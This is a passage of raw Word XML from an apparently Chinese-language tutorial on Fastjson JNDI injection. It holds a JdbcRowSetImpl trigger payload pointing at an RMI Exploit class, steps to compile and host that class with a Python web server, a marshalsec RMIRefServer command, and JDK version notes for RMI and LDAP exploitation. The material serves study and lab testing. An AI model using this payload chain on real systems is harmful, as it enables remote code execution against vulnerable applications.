          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>//            Runtime.getRuntime().exec(new String[]{"calc.exe"});</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>//        } catch (IOException e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>//            e.printStackTrace();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>//        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>//    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1234D3" w14:textId="0BCC3572" w:rsidR="008440DB" w:rsidRDefault="00392685" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放开，而构造函数注释，则不会弹出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；但是放开构造函数的注释，就能弹出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72581F4C" w14:textId="77777777" w:rsidR="00392685" w:rsidRDefault="00392685" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CDCD1A5" w14:textId="71266919" w:rsidR="00167D27" w:rsidRPr="00555E74" w:rsidRDefault="00167D27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F799F" w14:textId="77777777" w:rsidR="00167D27" w:rsidRDefault="00167D27" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>com.sun.rowset.JdbcRowSetImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dataSourceName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rmi://127.0.0.1:9999/Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>autoCommit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:true}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(payload);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D879055" w14:textId="6B5E98DB" w:rsidR="008440DB" w:rsidRDefault="00433E28" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79D06F" w14:textId="78B4EFD3" w:rsidR="00433E28" w:rsidRDefault="00433E28" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433E28">
        <w:lastRenderedPageBreak/>
        <w:t>"C:\Program Files\Java\jdk1.8.0_102\bin\javac.exe" Exploit.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C766135" w14:textId="77777777" w:rsidR="00433E28" w:rsidRDefault="00433E28" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DE7920" w14:textId="38B2A20F" w:rsidR="00003008" w:rsidRDefault="00003008" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启远程服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4473BAA7" w14:textId="165131C5" w:rsidR="002F1D20" w:rsidRDefault="00003008" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00003008">
        <w:t>python3 -m http.server 8999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5E68D" w14:textId="77777777" w:rsidR="002F1D20" w:rsidRPr="002F1D20" w:rsidRDefault="002F1D20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E81FE2" w14:textId="3185EB9D" w:rsidR="00433E28" w:rsidRPr="00167D27" w:rsidRDefault="002F1D20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72220D6A" w14:textId="325B88B3" w:rsidR="008440DB" w:rsidRDefault="00433E28" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433E28">
        <w:t>"C:\Program Files\Java\jdk1.8.0_102\bin\java.exe" -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://127.0.0.1:8999/#Exploit" 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7285C0AF" w14:textId="77777777" w:rsidR="00167D27" w:rsidRDefault="00167D27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB612D6" w14:textId="77777777" w:rsidR="008440DB" w:rsidRDefault="008440DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDD9A71" w14:textId="77777777" w:rsidR="006655D4" w:rsidRPr="006655D4" w:rsidRDefault="006655D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D9412F" w14:textId="1D0CC93C" w:rsidR="00510842" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDNI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本利用注意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F72D4C6" w14:textId="77777777" w:rsidR="00AE1EAB" w:rsidRDefault="00AE1EAB" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152C7F71" w14:textId="381618F9" w:rsidR="009361F7" w:rsidRDefault="009361F7" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42C8D2C9" wp14:editId="2D4B4A0E">
            <wp:extent cx="3724275" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="70950697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06971" name="图片 1" descr="图示&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3724275" cy="2571750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C310C9" w14:textId="77777777" w:rsidR="009361F7" w:rsidRDefault="009361F7" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35656835" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5B82E9" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B9ED53" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而言：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D26A55" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D462F46" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK8u113</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK6u132, JDK7u122</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本以下，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI + RMI lookup Reference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48905597" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64304E6E" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK8u113</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK6u132, JDK7u122</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的版本，可以利用存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Factory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类，具体可看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DC43A" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589DBEFC" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4A230" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABEE0B5" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
